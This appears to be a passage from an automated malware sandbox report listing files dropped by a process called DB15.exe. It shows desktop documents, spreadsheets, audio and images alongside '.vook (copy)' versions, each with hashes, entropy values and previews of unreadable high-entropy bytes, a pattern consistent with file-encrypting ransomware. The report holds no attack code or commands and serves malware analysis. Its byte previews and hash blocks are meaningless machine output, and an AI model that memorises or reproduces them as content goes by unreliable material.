                                                                                                                                                                                                                                      Entropy (8bit):7.829875317530163
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:2XMSLLJAt1sMKKchruP1mS/q0FB/bb5bbDcL+UuOlNPFTb/6YsMabiTkbD:tSLM1s7KccRS0FVn5bbDcuUNR/WMaOiD
                                                                                                                                                                                                                                      MD5:3282F9299FD5090179510794CA34EEF9
                                                                                                                                                                                                                                      SHA1:715EBB6442001FBC28D2A978F6AC5DCD69BFD5C8
                                                                                                                                                                                                                                      SHA-256:F37DDFE2CE33FEB0056947191B709AC9CC546EB9FA63922A530F4E2F7C1592C1
                                                                                                                                                                                                                                      SHA-512:7FA1A03A28E428EAF35151EFC43FC6CDC1E24EB158A64643A90A71D772B7C38DA032DD6A302D60689A216F18904A0E649916C3AD82F2E4296C4B18418523B2C7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.9.oGUY........Gg...HF/....e0.........1c<.m...`x-.0...R.s".]-..v..hh..~..kL.......[...{=..d.."o.yf.@J... .B....k.^3..8m.(.P.../..O.8.!..........XR........E...c....x7...I.........*..*..)0..........z..m.. .......0......-.=M..6...g.%`......n..9..)..>H....E.h..!..kV.....">h..zb...R..gg..KO!.....wD.E..^\.<dDI4...>....J.....aV4.^..!...-.{NH. 5.......C+........\t.".G./*.P../b....6\.6.2.mQ.....n:."cp..;Q_......b.o.'^.@......#4.?G.........H{.]#+z....o....%.,V.:........-e.[.J.H-......,c._ l....[.;.........1[.a.p...k1%^+.G~m.i..h....$..c.'@.WN...I6..ad5...G....^.pJ......S....Q.]..})......7.B%...D_.!u`..J"a3B..f.8.}K.pI..O....q.......Q..Q2.,0....*.Wc..)..fg%8_WT..!.)..C..x...[..K.-.&.....v..$...L9.xlM........1[.L....#.?..@-...Nv.+..Y.d.....A\mNG.l..jMS..(....Q(...dG...,B_..+..PtSx*U.....T.0.....f..A.'5.dB...)kG...6..xAE...{...K.Z...v;...m.=..M.;....-..%+F....:ir.....^.=q7.Mha..K.......wv.6.6..r.-..%..M.m...b....S ..:<y.;..4.H..=.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8565268321012205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:bA3UghriZYmgoB5Y3XVuk+ECo5oPxQF1QpbSRof1rFdHHIB1Ntn4UZKZiGFREliq:bAEgQWoUlqECo5oPy0pbSY1h6jNtnFZL
                                                                                                                                                                                                                                      MD5:6A7C52018A0CA0CCA151CF17DA69C864
                                                                                                                                                                                                                                      SHA1:0C80A51B7326C7D20260ABFF793871F243B76958
                                                                                                                                                                                                                                      SHA-256:7CD2E5870A06C13C748693947FDA0A02F95A4F7633432BCC7992E0B8710BCE0C
                                                                                                                                                                                                                                      SHA-512:68382E4DEFB22754B7BDDE7A796C987E13F46CE0FD30F4B8668182B2346245A86B5E3645DB46815612C37357A88319E861B0938290E81299681E9B14FBF31149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.98....:.../..p..B.M.....H..:.{..K...-.}..y.[..84.((...0.nTW..>+..l..5.w.B7....r1.y..#.........`.C.'.J....7-.%(.:.aP.r:...C...$.Ep..:'..j6..x>.....#...!...].lX..ZIi..p....<M.......|............;\....E...w|.Gl.3...+..B....&`...z.5../.m3\.|..O..z.....g.%bd.H...K.gJd%......t...A.@g...P...b..R.C..9.O..H...3/c..~.$.......*:.... ...n..;..J..Oh..N(.n.....Jh.....vy"v`..(~..*%;8...W.4_.......j!C5.P...].."w.jda.@..6..vF../.H.U.6>......>..7..TxlJ...6?..@..~8..a.4.l...}*.....}W.:.tI|....a.CM.....^..`p..V..@..M\..6..?@..db...b.S...eQ(...z..;...@....FD........a.t.p.E..:....J...P..v..v..?.,.$.[....O......T..........!...u.KR..=..e.@<.>..V... G>.Fpd4..2.)DF}3R+.F.$..&..m.kX.+.p.|.M.G^'.....<..+.a=.!......_....|..;...1l..@.k..6..3..tin......58T.......[X.....3.......\....Sh1$p...6........+.l..........R.E..&..]r.`.........5h,;..N4. ...7.......r...]./...i..E..."..GZ.q.v0r+F....K;.fX..-..B.....1.El..S.....b.|~...M..:#2 .v..z.Y<V7Y.........,N

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8565268321012205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:bA3UghriZYmgoB5Y3XVuk+ECo5oPxQF1QpbSRof1rFdHHIB1Ntn4UZKZiGFREliq:bAEgQWoUlqECo5oPy0pbSY1h6jNtnFZL
                                                                                                                                                                                                                                      MD5:6A7C52018A0CA0CCA151CF17DA69C864
                                                                                                                                                                                                                                      SHA1:0C80A51B7326C7D20260ABFF793871F243B76958
                                                                                                                                                                                                                                      SHA-256:7CD2E5870A06C13C748693947FDA0A02F95A4F7633432BCC7992E0B8710BCE0C
                                                                                                                                                                                                                                      SHA-512:68382E4DEFB22754B7BDDE7A796C987E13F46CE0FD30F4B8668182B2346245A86B5E3645DB46815612C37357A88319E861B0938290E81299681E9B14FBF31149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.98....:.../..p..B.M.....H..:.{..K...-.}..y.[..84.((...0.nTW..>+..l..5.w.B7....r1.y..#.........`.C.'.J....7-.%(.:.aP.r:...C...$.Ep..:'..j6..x>.....#...!...].lX..ZIi..p....<M.......|............;\....E...w|.Gl.3...+..B....&`...z.5../.m3\.|..O..z.....g.%bd.H...K.gJd%......t...A.@g...P...b..R.C..9.O..H...3/c..~.$.......*:.... ...n..;..J..Oh..N(.n.....Jh.....vy"v`..(~..*%;8...W.4_.......j!C5.P...].."w.jda.@..6..vF../.H.U.6>......>..7..TxlJ...6?..@..~8..a.4.l...}*.....}W.:.tI|....a.CM.....^..`p..V..@..M\..6..?@..db...b.S...eQ(...z..;...@....FD........a.t.p.E..:....J...P..v..v..?.,.$.[....O......T..........!...u.KR..=..e.@<.>..V... G>.Fpd4..2.)DF}3R+.F.$..&..m.kX.+.p.|.M.G^'.....<..+.a=.!......_....|..;...1l..@.k..6..3..tin......58T.......[X.....3.......\....Sh1$p...6........+.l..........R.E..&..]r.`.........5h,;..N4. ...7.......r...]./...i..E..."..GZ.q.v0r+F....K;.fX..-..B.....1.El..S.....b.|~...M..:#2 .v..z.Y<V7Y.........,N

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8432984193477555
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:kMT0tTsbLkDq1AkMWeNBtfTP7h2AYY8OjFcI64FyWcYjne9lLiTkbD:x0CP4qOk4vtfTv5jmIPKYCgiD
                                                                                                                                                                                                                                      MD5:AF6172CAECF73DA6ED86BCCEA4E5AEFA
                                                                                                                                                                                                                                      SHA1:15CF0BD38429DD3FFF4661F1556B2A8FF969A08B
                                                                                                                                                                                                                                      SHA-256:5471339EF57D7D4BFA4766459D9207B68886ADD775A4259221DF0CA6B7A0335C
                                                                                                                                                                                                                                      SHA-512:C495DC2D97E9643B6E565F58CB29979FDCCFCCA21F4F97CD54CC4A283B6A4FF786984F07DA4B931E8B68D36AAA936222207978FA561A1F24023BDC713D1B6ED2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC.....].!...*....OtF.. ..7..u.r.p..0.'.)OC{L.\..f..K.....k.do5...+.....`.lz.,+..+..........Q^.}..h'.?:.#..B..e.8.8.a_n...|,.XDe.....m.1;...k...<.....),.R..R.*7)........P......Cj.8p.4.....:'..:+*.L....wE.".I..l3..z.b...A.....i'o...#.-g...X+A.......za1..g....J$..Y(}P.-..`.}.Z..B'.8.-6.........G(+......k.d..4...`W......(n$.5.....N.2...~'J.Ls..F@...mQ.$..r.}0nN..#$-w....)#..4...T.aj.Ly..Q..cFw?.+...MZjwC..j.....ZL6y._.L......%.c.NM.y.......z......po.]A.r"C. .O'........ykF.)..+,..z/..nC...\#..V.~c.N5jY...SzD.y..D.....c.?J..2W..o.N{.{oyS..<....5.9....((D.,HO..F#.!.....N.t.Og..U.c....a...4.{...........oS.$5....;S.2..-.D*.U........[.W........ .j...r......_N.I..CK..T...U..+~.......J......$..`~.W._...7.k]C...P?.,..;#..4|..|zi."....A..Y.'.&...\....+..&...$.<.-<..:~.^...~-.m.......#.:zE..!.E.F...S...-..@nL....t.L.Hz,.T.o3.....fg.Ar...o....<.....4=K/...E.n(&.!.,..s....YK.G.#^.....r..9../....A...8Q$x.....i.e.........=A...{............4.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8432984193477555
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:kMT0tTsbLkDq1AkMWeNBtfTP7h2AYY8OjFcI64FyWcYjne9lLiTkbD:x0CP4qOk4vtfTv5jmIPKYCgiD
                                                                                                                                                                                                                                      MD5:AF6172CAECF73DA6ED86BCCEA4E5AEFA
                                                                                                                                                                                                                                      SHA1:15CF0BD38429DD3FFF4661F1556B2A8FF969A08B
                                                                                                                                                                                                                                      SHA-256:5471339EF57D7D4BFA4766459D9207B68886ADD775A4259221DF0CA6B7A0335C
                                                                                                                                                                                                                                      SHA-512:C495DC2D97E9643B6E565F58CB29979FDCCFCCA21F4F97CD54CC4A283B6A4FF786984F07DA4B931E8B68D36AAA936222207978FA561A1F24023BDC713D1B6ED2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC.....].!...*....OtF.. ..7..u.r.p..0.'.)OC{L.\..f..K.....k.do5...+.....`.lz.,+..+..........Q^.}..h'.?:.#..B..e.8.8.a_n...|,.XDe.....m.1;...k...<.....),.R..R.*7)........P......Cj.8p.4.....:'..:+*.L....wE.".I..l3..z.b...A.....i'o...#.-g...X+A.......za1..g....J$..Y(}P.-..`.}.Z..B'.8.-6.........G(+......k.d..4...`W......(n$.5.....N.2...~'J.Ls..F@...mQ.$..r.}0nN..#$-w....)#..4...T.aj.Ly..Q..cFw?.+...MZjwC..j.....ZL6y._.L......%.c.NM.y.......z......po.]A.r"C. .O'........ykF.)..+,..z/..nC...\#..V.~c.N5jY...SzD.y..D.....c.?J..2W..o.N{.{oyS..<....5.9....((D.,HO..F#.!.....N.t.Og..U.c....a...4.{...........oS.$5....;S.2..-.D*.U........[.W........ .j...r......_N.I..CK..T...U..+~.......J......$..`~.W._...7.k]C...P?.,..;#..4|..|zi."....A..Y.'.&...\....+..&...$.<.-<..:~.^...~-.m.......#.:zE..!.E.F...S...-..@nL....t.L.Hz,.T.o3.....fg.Ar...o....<.....4=K/...E.n(&.!.,..s....YK.G.#^.....r..9../....A...8Q$x.....i.e.........=A...{............4.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849361760516006
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O9LDABbFUTC1aYYwErbMkKgjC62EI7TNcnYt9GzsVK6Vxrub+B8kIBShKiTkbD:W4FF2ZV3KtFTGYPGGFVxrP8kfViD
                                                                                                                                                                                                                                      MD5:C25A079B3D65234222A7288D07E3D3C3
                                                                                                                                                                                                                                      SHA1:F7379991F48030C41C4C40336F8BA4E322859BBC
                                                                                                                                                                                                                                      SHA-256:72583053AFEC34A5BC4F36BF4DA15D7F6C2A3F75CAD29D95CA774AD5BFA01114
                                                                                                                                                                                                                                      SHA-512:7A14AC69BF85A61C0BD3FB5C1F60FB9F3A78BBDEFB20282350BAA8C63E67D55FA87443D5B69554A68F9E8CB798EC4774724483DF9F3FA479B669093B924D50EC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ4.-..C..l .|#H.i..3..IGI8.. .e.gz[q.9.v...(I.Q.....4..t....Wq...v....S.7..6 ......L.......U..H.i....c.........p....'].sb..p..L.9Q..fo........(.-...B..X.ei........nCx.l......#VFE+..... .5m.|.W........&....20v.!....+...OW.][....l....s.c....?....-&...0+'F..?o.0..M.P..H}...l...).....[D7...mY....?.dDE.77.E.(.)....h....Y.$.i.6.a8}...*.o$3.Q.-E...e.f.......ev.L0..9......;k].E8.l..J.xFJEQ.]...U..{.`.c.{..JfA.y>.z.8Q/.Y...BM.zf...k.^.|w.)?_..L.(...C...q.D.F;.:*.x..........P7..C...03.."N........%....4.t.<../6T.D.-.?.....P.XM.....E.R....]."u.8.....c~B....L...n.7..8....@?N38}bKG........YFJ.2)y.<G..w,..8..C.S.l.......@(w0...rw5[q..I.;+N..7U?A.]......1.Nci`;}.m.hI.8..@#....=.f..9.@.}._.......!.r.!.q.v...>0."..g.P..-S\........p+.X....&....E......./+.y.Qj8/.lX..-....6...r..Z....>....j.X!.%..".l_X.|.....p.d.&J.F...sg..L..Y.).....C.WTc.Vg..fbb...~R.G...Q....n.$...}z.-A4~.c=.G.u..r.@.....U..s...tM.R...`a+Xm....G.D..\...&...9...N;.lx2.r..;..j9c~.S.=....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849361760516006
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O9LDABbFUTC1aYYwErbMkKgjC62EI7TNcnYt9GzsVK6Vxrub+B8kIBShKiTkbD:W4FF2ZV3KtFTGYPGGFVxrP8kfViD
                                                                                                                                                                                                                                      MD5:C25A079B3D65234222A7288D07E3D3C3
                                                                                                                                                                                                                                      SHA1:F7379991F48030C41C4C40336F8BA4E322859BBC
                                                                                                                                                                                                                                      SHA-256:72583053AFEC34A5BC4F36BF4DA15D7F6C2A3F75CAD29D95CA774AD5BFA01114
                                                                                                                                                                                                                                      SHA-512:7A14AC69BF85A61C0BD3FB5C1F60FB9F3A78BBDEFB20282350BAA8C63E67D55FA87443D5B69554A68F9E8CB798EC4774724483DF9F3FA479B669093B924D50EC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ4.-..C..l .|#H.i..3..IGI8.. .e.gz[q.9.v...(I.Q.....4..t....Wq...v....S.7..6 ......L.......U..H.i....c.........p....'].sb..p..L.9Q..fo........(.-...B..X.ei........nCx.l......#VFE+..... .5m.|.W........&....20v.!....+...OW.][....l....s.c....?....-&...0+'F..?o.0..M.P..H}...l...).....[D7...mY....?.dDE.77.E.(.)....h....Y.$.i.6.a8}...*.o$3.Q.-E...e.f.......ev.L0..9......;k].E8.l..J.xFJEQ.]...U..{.`.c.{..JfA.y>.z.8Q/.Y...BM.zf...k.^.|w.)?_..L.(...C...q.D.F;.:*.x..........P7..C...03.."N........%....4.t.<../6T.D.-.?.....P.XM.....E.R....]."u.8.....c~B....L...n.7..8....@?N38}bKG........YFJ.2)y.<G..w,..8..C.S.l.......@(w0...rw5[q..I.;+N..7U?A.]......1.Nci`;}.m.hI.8..@#....=.f..9.@.}._.......!.r.!.q.v...>0."..g.P..-S\........p+.X....&....E......./+.y.Qj8/.lX..-....6...r..Z....>....j.X!.%..".l_X.|.....p.d.&J.F...sg..L..Y.).....C.WTc.Vg..fbb...~R.G...Q....n.$...}z.-A4~.c=.G.u..r.@.....U..s...tM.R...`a+Xm....G.D..\...&...9...N;.lx2.r..;..j9c~.S.=....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\NVWZAPQSQL.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842345702915883
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FxCpPh4nBtHsDjR3Xde3fjlXLX6K3l3bzmplOf54CrAShIep+C3IFZ+iTkbD:Fx2Pynnsl3XqXLXv3bH54Ck7Oa7iD
                                                                                                                                                                                                                                      MD5:59C2B16A6A655D5309CE2E7F0E832EAC
                                                                                                                                                                                                                                      SHA1:CEF0E6FB622504DFC49A8552B5C2445F7D3FDF18
                                                                                                                                                                                                                                      SHA-256:CAD32895C3E4010226CA180301920C8C0F6ED5B3B8994BB62979427BA8042ADC
                                                                                                                                                                                                                                      SHA-512:3B73DE371AEBB05579C4099EFD329FCD78FABE913CCD333DA348E51E0628466E98C1C22A422C83A5E7A3993B670096AF19EF1AEFB113238243051874740CC4E8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.j..+.P.F...1j.$.O..1..i.).0.*....vk...?^.....'...Vp.9r50..7.k.e.....?^..7.&.;0.x<..S...[{......./.I.V.|....nS`...u..2q.0).m...$...}?.V)bt/.0..1........n."";~...~....b5.%..27.v..#}.U.l....r......u ....OvG...04`..=....:....L.?\.....6..I....C.y..2.#.R...g......o..CE.o%.;.T..*#.;...~|.."L./.....BO@...|..g.DR6...fk.`...Q.,........#.$.].;......c...b....p..!......4V.V...P_...x.A..z..<%....`wV%z.hFR.*..o.wg..0.*....x]..ad.C.Udd ...N..L%P..;.7......V..^...E.Vx. .....:!.......).:.)o...!85.]YO.FB.......!...-...@........-.....Xq.K...h>..q.#..7...;.$...<......a.ay..y..2.O..j..c......!^..(...l..M\e....=...)....H..nn..U.u?!..l.U.,.W...@u.SK..t.%X.R:8..3n...s..~ [.1m.-........E..0....El..v..H......N!F..BX..g1.KN3.m.sh].t...........|........>.eJMA~B|.b..w...l...B-.'i...u...,....'!.}=D.P.Pg.nP<>.YJ..|B......Y-.....*..........!n..r.F.h..^X"....h1..;eZ..K.g.'c..r5....o..F.,.Av:=$C.Q..Y.F}....m...W4..L.fy....XX.sc..p.#(7.W.....F)D.1#N.'....n.f..E.J.V+o.q.2

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\NVWZAPQSQL.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842345702915883
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FxCpPh4nBtHsDjR3Xde3fjlXLX6K3l3bzmplOf54CrAShIep+C3IFZ+iTkbD:Fx2Pynnsl3XqXLXv3bH54Ck7Oa7iD
                                                                                                                                                                                                                                      MD5:59C2B16A6A655D5309CE2E7F0E832EAC
                                                                                                                                                                                                                                      SHA1:CEF0E6FB622504DFC49A8552B5C2445F7D3FDF18
                                                                                                                                                                                                                                      SHA-256:CAD32895C3E4010226CA180301920C8C0F6ED5B3B8994BB62979427BA8042ADC
                                                                                                                                                                                                                                      SHA-512:3B73DE371AEBB05579C4099EFD329FCD78FABE913CCD333DA348E51E0628466E98C1C22A422C83A5E7A3993B670096AF19EF1AEFB113238243051874740CC4E8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.j..+.P.F...1j.$.O..1..i.).0.*....vk...?^.....'...Vp.9r50..7.k.e.....?^..7.&.;0.x<..S...[{......./.I.V.|....nS`...u..2q.0).m...$...}?.V)bt/.0..1........n."";~...~....b5.%..27.v..#}.U.l....r......u ....OvG...04`..=....:....L.?\.....6..I....C.y..2.#.R...g......o..CE.o%.;.T..*#.;...~|.."L./.....BO@...|..g.DR6...fk.`...Q.,........#.$.].;......c...b....p..!......4V.V...P_...x.A..z..<%....`wV%z.hFR.*..o.wg..0.*....x]..ad.C.Udd ...N..L%P..;.7......V..^...E.Vx. .....:!.......).:.)o...!85.]YO.FB.......!...-...@........-.....Xq.K...h>..q.#..7...;.$...<......a.ay..y..2.O..j..c......!^..(...l..M\e....=...)....H..nn..U.u?!..l.U.,.W...@u.SK..t.%X.R:8..3n...s..~ [.1m.-........E..0....El..v..H......N!F..BX..g1.KN3.m.sh].t...........|........>.eJMA~B|.b..w...l...B-.'i...u...,....'!.}=D.P.Pg.nP<>.YJ..|B......Y-.....*..........!n..r.F.h..^X"....h1..;eZ..K.g.'c..r5....o..F.,.Av:=$C.Q..Y.F}....m...W4..L.fy....XX.sc..p.#(7.W.....F)D.1#N.'....n.f..E.J.V+o.q.2

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844613878531809
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:NWKAy1wZDO8pT4tRYizFFd0ZzbeA532RQpQ/2IzLIkcGeDf9q4shPkdKGiTkbD:NWKATpT6CROe32S/IzckFexpldKjiD
                                                                                                                                                                                                                                      MD5:37C9B1C48F905E14724BD99B5EB06233
                                                                                                                                                                                                                                      SHA1:D4C7BD3A7F689AA9D7D402F24F594257A3BDBD28
                                                                                                                                                                                                                                      SHA-256:299301E3539090DA057711E6ED3786650B44E44CDC1E980101A21A5026C6D1E7
                                                                                                                                                                                                                                      SHA-512:8EA6FB035D8361CDC2EEDED867A098323B73DF6F90AE46C6BDE939A59DAE40B679C44B52CFF890476060047E423BA5830C5C9D7E88DCD9D9510BCC5925505464
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.d....O ..Z..~G.%.5..1CC......~..l..L5.b.+M.....i.....hO!o%t:]de..J9...R...X.l...j...Z.L...S... .3}.m..h#..F...z..Wi...l.d;.......%......6....V.).....!. .^.......X...gU......9gR.'...xfvA""{?./...^.coY...O.).S...."Y/i7.ZZC.=.o(4....x.S3..p.h..5..'....vg.@P7I.....%&+7P.(...2.N...U.OI....e`s....<.b...F.......|nf.'W.?.!.=X.....O.......d.Q.&P........I..zv.,..Ci....i.9!../C..l_)gh^v,.V4..5n.0...4:..&..mM[.'..G..m.?...'..z.......[......V.^....!g..NC.r...8...._../.$sI.....h.(....5i.u.re....D..>...L..?.:O.I.e.A.A..b.(..+.....2...l.op.|.J.j{...is..2..\w...i{X,H....z>./..`N..........g.U....../..A.qK.....wg.+;x..........~Po.."A`I..X.....(.t;|....i...7..u.(........l.\..a..)6...s.{8....U".....k.._k....K....B..h.........."l.Ht.1.0..b....Q{:.r..t`.....+.L./']Ji.\..I..%&O3...j....^o.......a....U.r....n.M.....S7.YU...A..;*"a.U#.....+...?..'.....D**....T.S..9...].0.._N5..P.ak.._'.G...>8/..fY`.j.pYd.~.(.C..x...u../..8...F...."..y...../..@.........9..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\PWCCAWLGRE.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844613878531809
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:NWKAy1wZDO8pT4tRYizFFd0ZzbeA532RQpQ/2IzLIkcGeDf9q4shPkdKGiTkbD:NWKATpT6CROe32S/IzckFexpldKjiD
                                                                                                                                                                                                                                      MD5:37C9B1C48F905E14724BD99B5EB06233
                                                                                                                                                                                                                                      SHA1:D4C7BD3A7F689AA9D7D402F24F594257A3BDBD28
                                                                                                                                                                                                                                      SHA-256:299301E3539090DA057711E6ED3786650B44E44CDC1E980101A21A5026C6D1E7
                                                                                                                                                                                                                                      SHA-512:8EA6FB035D8361CDC2EEDED867A098323B73DF6F90AE46C6BDE939A59DAE40B679C44B52CFF890476060047E423BA5830C5C9D7E88DCD9D9510BCC5925505464
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.d....O ..Z..~G.%.5..1CC......~..l..L5.b.+M.....i.....hO!o%t:]de..J9...R...X.l...j...Z.L...S... .3}.m..h#..F...z..Wi...l.d;.......%......6....V.).....!. .^.......X...gU......9gR.'...xfvA""{?./...^.coY...O.).S...."Y/i7.ZZC.=.o(4....x.S3..p.h..5..'....vg.@P7I.....%&+7P.(...2.N...U.OI....e`s....<.b...F.......|nf.'W.?.!.=X.....O.......d.Q.&P........I..zv.,..Ci....i.9!../C..l_)gh^v,.V4..5n.0...4:..&..mM[.'..G..m.?...'..z.......[......V.^....!g..NC.r...8...._../.$sI.....h.(....5i.u.re....D..>...L..?.:O.I.e.A.A..b.(..+.....2...l.op.|.J.j{...is..2..\w...i{X,H....z>./..`N..........g.U....../..A.qK.....wg.+;x..........~Po.."A`I..X.....(.t;|....i...7..u.(........l.\..a..)6...s.{8....U".....k.._k....K....B..h.........."l.Ht.1.0..b....Q{:.r..t`.....+.L./']Ji.\..I..%&O3...j....^o.......a....U.r....n.M.....S7.YU...A..;*"a.U#.....+...?..'.....D**....T.S..9...].0.._N5..P.ak.._'.G...>8/..fY`.j.pYd.~.(.C..x...u../..8...F...."..y...../..@.........9..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821678855416415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mXr9ksUTeESKjDKNuOkzJn4LdRVhwKngDv1vwHcBlQeCFd2iDbUQXEwiTkbD:mb91K/K0zJM3YtkcYxvlXEBiD
                                                                                                                                                                                                                                      MD5:834A4712C3A6EE274974A885B45A6043
                                                                                                                                                                                                                                      SHA1:102B44703C124C01507F55A994937EBB9B81BFF4
                                                                                                                                                                                                                                      SHA-256:09B936DF53FFEC985BD4F6F7BEB5F57A589CA892AC55E839045F3BD939EC37E9
                                                                                                                                                                                                                                      SHA-512:75C642EEF81D0DEE78B9B26E22DEA9BA774C956BF44F6E2CB8F19251F4239973C452812C7978FFF8D6A3669023B75C15FA22D5BFA2F7780FCC377E0EA6280684
                                                                                                                                                                                                                                      Malicious:false
